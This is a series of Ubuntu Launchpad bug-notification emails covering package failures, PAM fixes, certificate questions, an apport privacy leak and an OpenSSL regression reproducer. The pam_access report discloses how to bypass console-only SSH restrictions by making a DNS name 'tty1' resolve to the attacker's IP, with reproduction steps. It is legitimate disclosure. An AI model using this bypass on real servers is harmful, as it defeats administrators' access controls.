There's over 2k instances of errors like this in the terminal log: dpkg: 경고: files list file for package 'libctf0:amd64' missing; assuming package has no files currently installed This is not a happy installation. I recommend a fresh install when convenient. As for the prompt, the history log suggests this was run during an unattended updates run. That'll be invisible to the user. (And, also, I think it's supposed to skip packages that change configuration files, but with a few thousand errors for missing file lists, we shouldn't be surprised that it doesn't work correctly.) Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to bluez in Ubuntu. https://bugs.launchpad.net/bugs/2045855 Title: package bluez 5.64-0ubuntu1.1 failed to install/upgrade: end of file on stdin at conffile prompt Status in bluez package in Ubuntu: Incomplete Bug description: I did not recognized the error. ProblemType: Package DistroRelease: Ubuntu 22.04 Package: bluez 5.64-0ubuntu1.1 ProcVersionSignature: Ubuntu 6.2.0-37.38~22.04.1-generic 6.2.16 Uname: Linux 6.2.0-37-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.5 AptOrdering: bluez:amd64: Install NULL: ConfigurePending Architecture: amd64 CasperMD5CheckResult: unknown Date: Thu Dec 7 15:44:57 2023 ErrorMessage: end of file on stdin at conffile prompt InstallationDate: Installed on 2021-01-30 (1040 days ago) InstallationMedia: Ubuntu 20.04.1 LTS "Focal Fossa" - Release amd64 (20200731) InterestingModules: rfcomm bnep btusb bluetooth MachineType: Dell Inc. OptiPlex 7010 ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-6.2.0-37-generic root=UUID=1aa27b2f-8d22-4b4e-931f-bd8e304ed0d4 ro quiet splash vt.handoff=7 Python3Details: /usr/bin/python3.10, Python 3.10.12, unpackaged PythonDetails: N/A RelatedPackageVersions: dpkg 1.21.1ubuntu2.2 apt 2.4.11 SourcePackage: bluez Title: package bluez 5.64-0ubuntu1.1 failed to install/upgrade: end of file on stdin at conffile prompt UpgradeStatus: Upgraded to jammy on 2023-03-28 (253 days ago) dmi.bios.date: 03/25/2013 dmi.bios.release: 4.6 dmi.bios.vendor: Dell Inc. dmi.bios.version: A13 dmi.board.name: 0GY6Y8 dmi.board.vendor: Dell Inc. dmi.board.version: A00 dmi.chassis.type: 6 dmi.chassis.vendor: Dell Inc. dmi.modalias: dmi:bvnDellInc.:bvrA13:bd03/25/2013:br4.6:svnDellInc.:pnOptiPlex7010:pvr01:rvnDellInc.:rn0GY6Y8:rvrA00:cvnDellInc.:ct6:cvr:sku: dmi.product.name: OptiPlex 7010 dmi.product.version: 01 dmi.sys.vendor: Dell Inc. hciconfig: hci0:Type: Primary Bus: USB BD Address: 00:1A:7D:DA:71:03 ACL MTU: 310:10 SCO MTU: 64:8 UP RUNNING PSCAN RX bytes:1332 acl:0 sco:0 events:84 errors:0 TX bytes:3786 acl:0 sco:0 commands:81 errors:0 mtime.conffile..etc.bluetooth.input.conf: 2020-04-03T15:47:01 mtime.conffile..etc.bluetooth.main.conf: 2020-02-26T18:57:50 mtime.conffile..etc.bluetooth.network.conf: 2012-12-25T02:46:55 mtime.conffile..etc.dbus-1.system.d.bluetooth.conf: 2022-03-24T15:30:38 mtime.conffile..etc.init.d.bluetooth: 2020-02-26T18:57:50 rfkill: 0: hci0: Bluetooth Soft blocked: no Hard blocked: no To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/bluez/+bug/2045855/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2045250] Re: pam_lastlog doesn't handle localtime_r related errors properly
I'm uncomfortable with the idea of printing nothing when the routines
fail.
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/2045250
Title:
pam_lastlog doesn't handle localtime_r related errors properly
Status in Ubuntu on IBM z Systems:
New
Status in pam package in Ubuntu:
New
Status in pam package in Fedora:
Fix Released
Bug description:
The pam version(s) in Debian (checked buster) and Ubuntu (checked focal to
noble) are affected by
https://bugzilla.redhat.com/show_bug.cgi?id=2012871
Customers report a command going through PAM crashing for a given user.
A potential follow on issue can be that no ssh remote connections to an
affected server are possible anymore, esp. painful with headless systems (was
reported on a different distro).
This is caused by an issue in modules/pam_lastlog/pam_lastlog.c:
with tm = localtime_r(...) that can be NULL and needs to be handled.
There are two such cases in modules/pam_lastlog/pam_lastlog.c (here noble):
314- ll_time = last_login.ll_time;
315: if ((tm = localtime_r (&ll_time, &tm_buf)) != NULL) {
316- strftime (the_time, sizeof (the_time),
317- /* TRANSLATORS: "strftime options for date of last
login" */
--
574-
575- lf_time = utuser.ut_tv.tv_sec;
576: tm = localtime_r (&lf_time, &tm_buf);
577- strftime (the_time, sizeof (the_time),
578- /* TRANSLATORS: "strftime options for date of last login" */
Case 1 (line 315) is properly handled, but not case 2 (line 576).
The second case got fixed by:
https://github.com/linux-pam/linux-pam/commit/40c271164dbcebfc5304d0537a42fb42e6b6803c
This fix should be included in Ubuntu (and Debian).
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu-z-systems/+bug/2045250/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2046367] Re: AlphaSSL SHA256 G4 Intermediate Certificate missing
Normally, intermediate certificates are supposed to be included by the leaf certificate owners in their chain of certificates to their roots. It is unusual for intermediate certificates to be included in the CA bundle. GlobalSign has instructions for many applications on their website: https://support.globalsign.com/ssl/ssl-certificates- installation I suspect whatever you're problem you're trying to solve would be better solved by a site administrator rather than us. What problem are you trying to solve? Why is including intermediate certificates in our CA bundle the right answer for solving the problem? Thanks ** Changed in: ca-certificates (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ca-certificates in Ubuntu. https://bugs.launchpad.net/bugs/2046367 Title: AlphaSSL SHA256 G4 Intermediate Certificate missing Status in ca-certificates package in Ubuntu: Incomplete Bug description: Please add AlphaSSL SHA256 G4 Intermediate Certificate into ca- certificates. https://support.globalsign.com/ca-certificates/intermediate- certificates/alphassl-intermediate-certificates To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ca-certificates/+bug/2046367/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2046367] Re: AlphaSSL SHA256 G4 Intermediate Certificate missing
Hey Andrey, thanks; I think they've almost got it right -- the Qualys TLS compliance tool says the chain is in the wrong order so it might not work everywhere, but certainly it'll work better than just Ubuntu adding one intermediate: https://www.ssllabs.com/ssltest/analyze.html?d=smsc.kz Thanks ** Changed in: ca-certificates (Ubuntu) Status: Incomplete => Won't Fix -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ca-certificates in Ubuntu. https://bugs.launchpad.net/bugs/2046367 Title: AlphaSSL SHA256 G4 Intermediate Certificate missing Status in ca-certificates package in Ubuntu: Won't Fix Bug description: Please add AlphaSSL SHA256 G4 Intermediate Certificate into ca- certificates. https://support.globalsign.com/ca-certificates/intermediate- certificates/alphassl-intermediate-certificates To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ca-certificates/+bug/2046367/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2046526] Re: pam_access Configuration Treats TTY Names as Hostnames
I wondered if it would look up LOCAL too but figured the reference in the manual to pam_get_item(3) meant that it would special case this one without any lookups. I should have looked at the source instead. I like your idea of using two different files for local vs networked services. (Though that doesn't exactly help with su or sudo, since they can be used by both.) It's not ideal but it's straightforward. ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to pam in Ubuntu. https://bugs.launchpad.net/bugs/2046526 Title: pam_access Configuration Treats TTY Names as Hostnames Status in pam package in Ubuntu: New Bug description: Comments in PAM service files at /etc/pam.d/* suggest a line to uncomment to configure complicated authorization rules using pam_access (which in turn is configured by /etc/security/access.conf): /etc/pam.d/sshd: # Uncomment and edit /etc/security/access.conf if you need to set complex # access limits that are hard to express in sshd_config. # account required pam_access.so /etc/pam.d/login: # Uncomment and edit /etc/security/access.conf if you need to # set access limits. # (Replaces /etc/login.access file) # account required pam_access.so Comments in /etc/security/access.conf indicate the origin in this file can be a TTY or domain name: # The third field should be a list of one or more tty names (for # non-networked logins), host names, domain names (begin with "."), I wanted to configure a user on my server, 'localadmin', who can only log in on the console and not via any network service and tried to achieve this using pam_access as follows: I uncommented the default ‘account required pam_access.so’ lines in /etc/pam.d/sshd and /etc/pam.d/login. I add the following in /etc/security/access.conf intending to allow user 'localadmin' to only log in on the console: +:localadmin:tty1 -:localadmin:ALL This seems to work. Login via SSH fails and succeeds on the console, as expected. However, /var/log/auth.log suspiciously indicates it is treating tty1 as a hostname during the failed SSH attempt: Dec 15 01:28:12 server sshd[5868]: pam_access(sshd:account): cannot resolve hostname "tty1" Dec 15 01:28:12 server sshd[5868]: pam_access(sshd:account): access denied for user `localadmin' from `10.0.0.101' It is confirmed to be doing DNS lookups for 'tty1' in the search domain during the login attempt: admin@server:~$ resolvectl status eth0 ... DNS Servers: 10.0.0.2 DNS Domain: example.com admin@server:~$ sudo tcpdump -i eth0 -n port 53 01:28:12.100348 IP 10.0.0.42.44968 > 10.0.0.2.53: 21558+ [1au] A? tty1.example.com. (45) 01:28:12.100666 IP 10.0.0.42.44669 > 10.0.0.2.53: 40453+ [1au] ? tty1.example.com. (45) 01:28:12.103027 IP 10.0.0.2.53 > 10.0.0.42.44968: 21558 NXDomain* 0/1/1 (95) 01:28:12.103027 IP 10.0.0.2.53 > 10.0.0.42.44669: 40453 NXDomain* 0/1/1 (95) I configured my DNS service to resolve hostname 'tty1' to the IP address the SSH connection originates from: admin@server:~$ dig +short tty1.example.com 10.0.0.101 SSH access is then unexpectedly allowed: user@clienthost:~$ ip -4 a show dev eth0 inet 10.0.0.101/24 ... user@clienthost:~$ ssh localadmin@10.0.0.42 localadmin@10.0.0.42's password: localadmin@server:~$ I think the local origins should be completely separated from network origins in /etc/security/access.conf somehow (maybe with separate access.conf files used for local and network PAM services). Other requested bug report info: root@server:~# lsb_release -rd Description:Ubuntu 22.04.3 LTS Release:22.04 root@server:~# apt-cache policy pam N: Unable to locate package pam root@server:~# apt-cache policy libpam-modules libpam-modules: Installed: 1.4.0-11ubuntu2.3 Candidate: 1.4.0-11ubuntu2.3 Version table: *** 1.4.0-11ubuntu2.3 500 500 http://archive.ubuntu.com/ubuntu jammy-updates/main amd64 Packages 500 http://security.ubuntu.com/ubuntu jammy-security/main amd64 Packages 100 /var/lib/dpkg/status 1.4.0-11ubuntu2 500 500 http://archive.ubuntu.com/ubuntu jammy/main amd64 Packages To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pam/+bug/2046526/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2046633] Re: Don't include 'nmcli -f all con' output in bug report (for privacy)
** Information type changed from Private Security to Public Security
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to network-manager in Ubuntu.
https://bugs.launchpad.net/bugs/2046633
Title:
Don't include 'nmcli -f all con' output in bug report (for privacy)
Status in network-manager package in Ubuntu:
New
Bug description:
The apport bug reporting hooks for this package
(/usr/share/apport/package/hooks/source_network-manager{,-applet}.py)
include the output of `nmcli -f all con`. This lists all wifi SSIDs
that the user has ever connected to, and the date of last connection.
I think this is a privacy problem, as it tends to reveal the user's
recent whereabouts, and it's posted publicly on launchpad. (Imagine
for instance an entry for "LoveMotelGuestWifi" at a time when the user
had said they were at the office...)
It is disclosed to the user before the report is sent, but only if
they think to expand that item in the "Send / Don't send" dialog
(which is not descriptively labeled), and there is no way to opt out
of it. You can delete it manually from launchpad afterward, which is
what I am going to do with this bug report, but I doubt most people
would know to do that.
This info should probably not be included at all, or if it is, it
should be sanitized. Also, it might be a good idea to purge launchpad
of all such files.
(Marking this as "security" in case you consider this kind of a
privacy leak to be something the security team should handle. If not,
feel free to demote it to an ordinary bug.)
ProblemType: Bug
DistroRelease: Ubuntu 23.10
Package: network-manager 1.44.2-1ubuntu1.2
ProcVersionSignature: Ubuntu 6.5.0-14.14-generic 6.5.3
Uname: Linux 6.5.0-14-generic x86_64
ApportVersion: 2.27.0-0ubuntu5
Architecture: amd64
CasperMD5CheckResult: unknown
Date: Sat Dec 16 14:38:45 2023
IfupdownConfig:
# interfaces(5) file used by ifup(8) and ifdown(8)
auto lo
iface lo inet loopback
InstallationDate: Installed on 2019-06-03 (1657 days ago)
InstallationMedia: Ubuntu 19.04 "Disco Dingo" - Release amd64 (20190416)
IpRoute:
default via 192.168.1.13 dev enxa0cec8c4f782 proto dhcp src 192.168.1.60
metric 100
169.254.0.0/16 dev virbr0 scope link metric 1000 linkdown
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 linkdown
192.168.1.0/24 dev enxa0cec8c4f782 proto kernel scope link src 192.168.1.60
metric 100
192.168.122.0/24 dev virbr0 proto kernel scope link src 192.168.122.1
linkdown
ProcEnviron:
LANG=en_US.UTF-8
PATH=(custom, no user)
SHELL=/bin/bash
TERM=xterm-256color
XDG_RUNTIME_DIR=
SourcePackage: network-manager
UpgradeStatus: Upgraded to mantic on 2023-12-14 (3 days ago)
modified.conffile..etc.default.apport:
# set this to 0 to disable apport, or to 1 to enable it
# you can temporarily override this with
# sudo service apport start force_start=1
enabled=0
mtime.conffile..etc.default.apport: 2020-08-04T11:07:36.415303
nmcli-nm:
RUNNING VERSION STATE STARTUP CONNECTIVITY NETWORKING WIFI-HW
WIFI WWAN-HW WWAN
running 1.44.2 connected started full enabled enabled
enabled missing enabled
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/network-manager/+bug/2046633/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1892559] Re: [MIR] ccid libpam-pkcs1 libpcsc-perl opensc pcsc-tools pcsc-lite
Thanks Marco, I'll take pam-pkcs11 off our todo list. (This can be reversed, of course. If it turns out to be necessary for something, someone shout. :) Thanks ** Changed in: pam-pkcs11 (Ubuntu) Status: New => Invalid ** Changed in: pam-pkcs11 (Ubuntu) Assignee: Ubuntu Security Team (ubuntu-security) => (unassigned) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to pcsc-lite in Ubuntu. https://bugs.launchpad.net/bugs/1892559 Title: [MIR] ccid libpam-pkcs1 libpcsc-perl opensc pcsc-tools pcsc-lite Status in ccid package in Ubuntu: New Status in opensc package in Ubuntu: Incomplete Status in pam-pkcs11 package in Ubuntu: Invalid Status in pcsc-lite package in Ubuntu: New Status in pcsc-perl package in Ubuntu: Invalid Status in pcsc-tools package in Ubuntu: Invalid Bug description: ==> ccid <== [Availability] ccid is in universe, and builds on all architectures. [Rationale] The desktop team and security team are interested in bringing smartcard authentication to enterprise desktop environments. [Security] No CVEs for ccid are listed in our database. Doesn't appear to bind to a socket. No privileged executables, but does have udev rules. Probably needs a security review. [Quality assurance] No test suite. Does require odd hardware that we'll probably need to buy. I don't see debconf questions. ccid is well maintained in Debian by upstream author. One open wishlist bug in BTS, harmless. One open bug in launchpad, not security, but looks very frustrating for the users. The upstream author was engaged but it never reached resolution. https://bugs.launchpad.net/ubuntu/+source/ccid/+bug/1175465 Has a debian/watch file. Quilt packaging. P: ccid source: no-dep5-copyright P: ccid source: package-uses-experimental-debhelper-compat-version 13 [Dependencies] Minimal dependencies, in main [Standards compliance] Appears to satisfy FHS and Debian policy [Maintenance] The desktop team will subscribe to bugs, however it is expected that the security team will assist with security-relevant questions. [Background information] ccid provides drivers to interact with usb-connected smart card readers. ==> libpam-pkcs11 <== [Availability] Source package pam-pkcs11 is in universe and builds on all architectures. [Rationale] The desktop team and security team are interested in bringing smartcard authentication to enterprise desktop environments. [Security] No CVEs in our database. Doesn't appear to bind to sockets. No privileged executables (but is a PAM module). As a PAM module this will require a security review. [Quality assurance] The package does not call pam-auth-update in its postinst #1650366 Does not ask questions during install. One Ubuntu bug claims very poor behaviour if a card isn't plugged in. No Debian bugs. Occasional updates in Debian by long-term maintainer. Does require odd hardware that we'll probably need to buy. Does not appear to run tests during build. Has scary warnings in the build logs. Has a debian/watch file. Ancient standards version; other smaller lintian messages, mostly documentation problems. Quilt packaging. [Dependencies] Depends on libcurl4, libldap-2.4-2, libpam0g, libpcsclite1, libssl1.1 All are in main. [Standards compliance] The package does not call pam-auth-update in its postinst #1650366 Otherwise looks to conform to FHS and Debian policies [Maintenance] The desktop team will subscribe to bugs, however it is expected that the security team will assist with security-relevant questions. [Background information] This PAM module can use CRLs and full-chain verification of certificates. It can also do LDAP, AD, and Kerberos username mapping. ==> libpcsc-perl <== [Availability] Source package pcsc-perl is in universe, builds for all architectures, plus i386 [Rationale] The desktop team and security team are interested in bringing smartcard authentication to enterprise desktop environments. [Security] There are no cves for pcsc-perl in our database. No privileged executables. Doesn't appear to bind to sockets. Probably needs a security review. [Quality assurance] Library package not intended to be used directly. No debconf questions. No bugs in Debian. No bugs in Ubuntu. Does require odd hardware that we'll probably need to buy. Tests exist, not run during the build; probably can't run during the build. Includes debian/watch file. A handful of lintian issues Quilt packaging. [Dependencies] libpcsc-perl depends upon libpcsclite1, libc6, perl, perlapi-5.30.0. All are in main. [Standards compliance] One oddity, Card.pod is stored in /usr/lib/x86_64-linux-gnu/perl5/5.30/Chipcard/PCSC/ Many other perl packages have .pod files in these directory trees so maybe it's fine, but it seems
[Touch-packages] [Bug 1926254] Re: x509 Certificate verification fails when basicConstraints=CA:FALSE, pathlen:0 on self-signed leaf certs
Hello Dan and Matthew, thanks for working on this. I gave the debdiffs a look, skimmed through openssl changes, and don't see any reason to not do this. There *are* larger changes to that function in https://github.com/openssl/openssl/commit/1e41dadfa7b9f792ed0f4714a3d3d36f070cf30e -- but it's a fairly invasive change, and I'm not recommending or suggesting we take it instead. It'd be nice though if someone could double-check the certs in question against a build that uses this newer commit and make sure that we're not backporting a very short-lived functional change. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/1926254 Title: x509 Certificate verification fails when basicConstraints=CA:FALSE,pathlen:0 on self-signed leaf certs Status in openssl package in Ubuntu: Fix Released Status in openssl source package in Focal: In Progress Status in openssl source package in Groovy: In Progress Status in openssl source package in Hirsute: Fix Released Bug description: [Impact] In openssl 1.1.1f, the below commit was merged: commit ba4356ae4002a04e28642da60c551877eea804f7 Author: Bernd Edlinger Date: Sat Jan 4 15:54:53 2020 +0100 Subject: Fix error handling in x509v3_cache_extensions and related functions Link: https://github.com/openssl/openssl/commit/ba4356ae4002a04e28642da60c551877eea804f7 This introduced a regression which caused certificate validation to fail when certificates violate RFC 5280 [1], namely, when a certificate has "basicConstraints=CA:FALSE,pathlen:0". This combination is commonly seen by self-signed leaf certificates with an intermediate CA before the root CA. Because of this, openssl 1.1.1f rejects these certificates and they cannot be used in the system certificate store, and ssl connections fail when you try to use them to connect to a ssl endpoint. The error you see when you try verify is: $ openssl verify -CAfile CA/rootCA_cert.pem -untrusted CA/subCA_cert.pem user1_cert.pem error 20 at 0 depth lookup: unable to get local issuer certificate error user1_cert.pem: verification failed The exact same certificates work fine on Xenial, Bionic and Hirsute. [1] https://tools.ietf.org/html/rfc5280.html [Testcase] We will create our own root CA, intermediate CA and leaf server certificate. Create necessary directories: $ mkdir reproducer $ cd reproducer $ mkdir CA Write openssl configuration files to disk for each CA and cert: $ cat << EOF >> rootCA.cnf [ req ] prompt = no distinguished_name = req_distinguished_name x509_extensions = usr_cert [ req_distinguished_name ] C = DE O = Test Org CN = Test RSA PSS Root-CA [ usr_cert ] basicConstraints= critical,CA:TRUE keyUsage= critical,keyCertSign,cRLSign subjectKeyIdentifier= hash authorityKeyIdentifier = keyid:always EOF $ cat << EOF >> subCA.cnf [ req ] prompt = no distinguished_name = req_distinguished_name x509_extensions = usr_cert [ req_distinguished_name ] C = DE O = Test Org CN = Test RSA PSS Sub-CA [ usr_cert ] basicConstraints= critical,CA:TRUE,pathlen:0 keyUsage= critical,keyCertSign,cRLSign subjectKeyIdentifier= hash authorityKeyIdentifier = keyid:always EOF $ cat << EOF >> user.cnf [ req ] prompt = no distinguished_name = req_distinguished_name x509_extensions = usr_cert [ req_distinguished_name ] C = DE O = Test Org CN = Test User [ usr_cert ] basicConstraints= critical,CA:FALSE,pathlen:0 keyUsage= critical,digitalSignature,keyAgreement extendedKeyUsage= clientAuth,serverAuth subjectKeyIdentifier= hash authorityKeyIdentifier = keyid:always EOF Then generate the necessary RSA keys and form certificates: $ openssl genpkey -algorithm RSA-PSS -out rootCA_key.pem -pkeyopt rsa_keygen_bits:2048 $ openssl req -config rootCA.cnf -set_serial 01 -new -batch -sha256 -nodes -x509 -days 9125 -out CA/rootCA_cert.pem -key rootCA_key.pem -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1 $ openssl genpkey -algorithm RSA-PSS -out subCA_key.pem -pkeyopt rsa_keygen_bits:2048 $ openssl req -config subCA.cnf -new -out subCA_req.pem -key subCA_key.pem -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1 $ openssl x509 -req -sha256 -in subCA_req.pem -CA CA/rootCA_cert.pem -CAkey rootCA_key.pem -out CA/subCA_cert.pem -CAserial rootCA_serial.txt -CAcreateserial -extfile subCA.cnf -extensions usr_cert -days 4380 -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1 $ c_rehash CA $ openssl genpkey -algorithm RSA-PSS -out user1_key.pem -pkeyopt rsa_keygen_bits:2048 $ openssl req -config user.cnf -new -out user1_req.pem -key user1_key.pem -sigopt rsa_paddin
[Touch-packages] [Bug 1926254] Re: x509 Certificate verification fails when basicConstraints=CA:FALSE, pathlen:0 on self-signed leaf certs
Matthew, thanks so much! sounds good to me. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/1926254 Title: x509 Certificate verification fails when basicConstraints=CA:FALSE,pathlen:0 on self-signed leaf certs Status in openssl package in Ubuntu: Fix Released Status in openssl source package in Focal: In Progress Status in openssl source package in Groovy: In Progress Status in openssl source package in Hirsute: Fix Released Bug description: [Impact] In openssl 1.1.1f, the below commit was merged: commit ba4356ae4002a04e28642da60c551877eea804f7 Author: Bernd Edlinger Date: Sat Jan 4 15:54:53 2020 +0100 Subject: Fix error handling in x509v3_cache_extensions and related functions Link: https://github.com/openssl/openssl/commit/ba4356ae4002a04e28642da60c551877eea804f7 This introduced a regression which caused certificate validation to fail when certificates violate RFC 5280 [1], namely, when a certificate has "basicConstraints=CA:FALSE,pathlen:0". This combination is commonly seen by self-signed leaf certificates with an intermediate CA before the root CA. Because of this, openssl 1.1.1f rejects these certificates and they cannot be used in the system certificate store, and ssl connections fail when you try to use them to connect to a ssl endpoint. The error you see when you try verify is: $ openssl verify -CAfile CA/rootCA_cert.pem -untrusted CA/subCA_cert.pem user1_cert.pem error 20 at 0 depth lookup: unable to get local issuer certificate error user1_cert.pem: verification failed The exact same certificates work fine on Xenial, Bionic and Hirsute. [1] https://tools.ietf.org/html/rfc5280.html [Testcase] We will create our own root CA, intermediate CA and leaf server certificate. Create necessary directories: $ mkdir reproducer $ cd reproducer $ mkdir CA Write openssl configuration files to disk for each CA and cert: $ cat << EOF >> rootCA.cnf [ req ] prompt = no distinguished_name = req_distinguished_name x509_extensions = usr_cert [ req_distinguished_name ] C = DE O = Test Org CN = Test RSA PSS Root-CA [ usr_cert ] basicConstraints= critical,CA:TRUE keyUsage= critical,keyCertSign,cRLSign subjectKeyIdentifier= hash authorityKeyIdentifier = keyid:always EOF $ cat << EOF >> subCA.cnf [ req ] prompt = no distinguished_name = req_distinguished_name x509_extensions = usr_cert [ req_distinguished_name ] C = DE O = Test Org CN = Test RSA PSS Sub-CA [ usr_cert ] basicConstraints= critical,CA:TRUE,pathlen:0 keyUsage= critical,keyCertSign,cRLSign subjectKeyIdentifier= hash authorityKeyIdentifier = keyid:always EOF $ cat << EOF >> user.cnf [ req ] prompt = no distinguished_name = req_distinguished_name x509_extensions = usr_cert [ req_distinguished_name ] C = DE O = Test Org CN = Test User [ usr_cert ] basicConstraints= critical,CA:FALSE,pathlen:0 keyUsage= critical,digitalSignature,keyAgreement extendedKeyUsage= clientAuth,serverAuth subjectKeyIdentifier= hash authorityKeyIdentifier = keyid:always EOF Then generate the necessary RSA keys and form certificates: $ openssl genpkey -algorithm RSA-PSS -out rootCA_key.pem -pkeyopt rsa_keygen_bits:2048 $ openssl req -config rootCA.cnf -set_serial 01 -new -batch -sha256 -nodes -x509 -days 9125 -out CA/rootCA_cert.pem -key rootCA_key.pem -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1 $ openssl genpkey -algorithm RSA-PSS -out subCA_key.pem -pkeyopt rsa_keygen_bits:2048 $ openssl req -config subCA.cnf -new -out subCA_req.pem -key subCA_key.pem -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1 $ openssl x509 -req -sha256 -in subCA_req.pem -CA CA/rootCA_cert.pem -CAkey rootCA_key.pem -out CA/subCA_cert.pem -CAserial rootCA_serial.txt -CAcreateserial -extfile subCA.cnf -extensions usr_cert -days 4380 -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1 $ c_rehash CA $ openssl genpkey -algorithm RSA-PSS -out user1_key.pem -pkeyopt rsa_keygen_bits:2048 $ openssl req -config user.cnf -new -out user1_req.pem -key user1_key.pem -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1 $ openssl x509 -req -sha256 -in user1_req.pem -CA CA/subCA_cert.pem -CAkey subCA_key.pem -out user1_cert.pem -CAserial subCA_serial.txt -CAcreateserial -extfile user.cnf -extensions usr_cert -days 1825 -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1 Now, let's try verify the generated certificates: $ openssl version OpenSSL 1.1.1f 31 Mar 2020 $ openssl verify -CAfile CA/rootCA_cert.pem -untrusted CA/subCA_cert.pem user1_cert.pem error 20 at 0 depth lookup: unable to get
[Touch-packages] [Bug 1873627] Re: auditd fails after moving /var it a new filesystem and turning /var/run into a symlink to /run
Thanks for the strace, these looked like the 'important' parts:
sendto(3, {{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, seq=3,
pid=0},
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa2\xb8\x29\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...},
56, 0, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=}, 12) = 56
poll([{fd=3, events=POLLIN}], 1, 500) = 1 ([{fd=3, revents=POLLIN}])
recvfrom(3, {{len=76, type=NLMSG_ERROR, flags=0, seq=3, pid=2734242},
{error=-EEXIST, msg={{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK,
seq=3, pid=0},
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa2\xb8\x29\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}}},
8988, MSG_PEEK|MSG_DONTWAIT, {sa_family=AF_NETLINK, nl_pid=0,
nl_groups=}, [12]) = 76
recvfrom(3, {{len=76, type=NLMSG_ERROR, flags=0, seq=3, pid=2734242},
{error=-EEXIST, msg={{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK,
seq=3, pid=0},
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa2\xb8\x29\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}}},
8988, MSG_DONTWAIT, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=},
[12]) = 76
write(2, "Error setting audit daemon pid ("..., 44Error setting audit daemon
pid (File exists)) = 44
...
write(2, "The audit daemon is exiting.", 28The audit daemon is exiting.) = 28
write(2, "\n", 1
) = 1
sendto(3, {{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, seq=4,
pid=0},
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...},
56, 0, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=}, 12) = 56
poll([{fd=3, events=POLLIN}], 1, 500) = 1 ([{fd=3, revents=POLLIN}])
recvfrom(3, {{len=76, type=NLMSG_ERROR, flags=0, seq=4, pid=2734242},
{error=-EACCES, msg={{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK,
seq=4, pid=0},
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}}},
8988, MSG_PEEK|MSG_DONTWAIT, {sa_family=AF_NETLINK, nl_pid=0,
nl_groups=}, [12]) = 76
